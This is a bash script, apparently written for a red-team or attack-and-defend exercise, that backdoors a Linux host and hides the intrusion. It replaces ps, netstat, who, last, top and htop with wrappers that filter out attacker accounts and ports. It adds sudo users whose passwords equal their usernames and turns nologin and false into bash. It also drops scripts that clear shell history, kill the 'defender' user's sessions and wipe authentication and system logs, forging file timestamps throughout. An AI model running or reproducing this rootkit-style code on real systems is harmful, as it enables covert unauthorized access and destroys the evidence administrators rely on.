#!/usr/bin/env bash
bins=("who" "last" "top" "netstat" "ps" "htop")
replacewith=("what" "long" "pot" "nest" "elf" "hpot")
exclude="mail|uucp|ssh_client|capbarb|grep|what|elf|9999|2323|1919|1212"
TIMESTAMP_REF="/usr/bin/xargs"

drop_script() {
    local path="$1"
    echo "$2" > "$path"
    chmod +x "$path"
    touch -r "$TIMESTAMP_REF" "$path"
}
for i in "${!bins[@]}"; do
    cmd="${bins[$i]}"
    swap="${replacewith[$i]}"
    orig_path=$(which "$cmd")
    real_bin="$(dirname "$orig_path")/$swap"

    if [ -n "$orig_path" ] && [ ! -f "$real_bin" ]; then
        mv "$orig_path" "$real_bin"

        echo "#!/usr/bin/env bash
$real_bin \"\$@\" | grep -Ev '$exclude'" > "$orig_path"
        chmod +x "$orig_path"
        touch -r "$real_bin" "$orig_path"
        echo "[+] $cmd -> $swap"
    else
        echo "[!] $cmd already modified, skipping."
    fi
done

newusers=("vyatta" "capbarb" "ssh_client")
modusers=("uucp" "mail" "games")

for user in "${newusers[@]}"; do
  useradd -m "$user" -s /bin/bash
  usermod -aG sudo "$user"
  echo "$user:$user" | chpasswd
  echo "[-] $user created"
done

for moduser in "${modusers[@]}"; do
  usermod -aG sudo "$moduser"
  echo "$moduser:$moduser" | chpasswd
  echo "[.] $moduser modified"
done

echo "/usr/sbin/nologin /usr/bin/false" | xargs -n 1 cp /bin/bash
md5sum /bin/bash
md5sum /usr/sbin/nologin
md5sum /usr/bin/false

drop_script /usr/bin/ww   "$(printf 'unset HISTFILE\nhistory -c')"
drop_script /usr/bin/mm   "pkill -u defender"
drop_script /usr/bin/look "cat /home/defender/.bash_history"

cat << 'EOF' > /usr/bin/logre
#!/usr/bin/env bash
[ -f /var/log/auth.log ] && truncate -s 0 /var/log/auth.log
truncate -s 0 /var/log/wtmp
truncate -s 0 /var/log/btmp
truncate -s 0 /var/log/lastlog
truncate -s 0 /var/log/syslog
sudo journalctl --vacuum-time=1s
EOF
chmod +x /usr/bin/logre && touch -r "$TIMESTAMP_REF" /usr/bin/logre
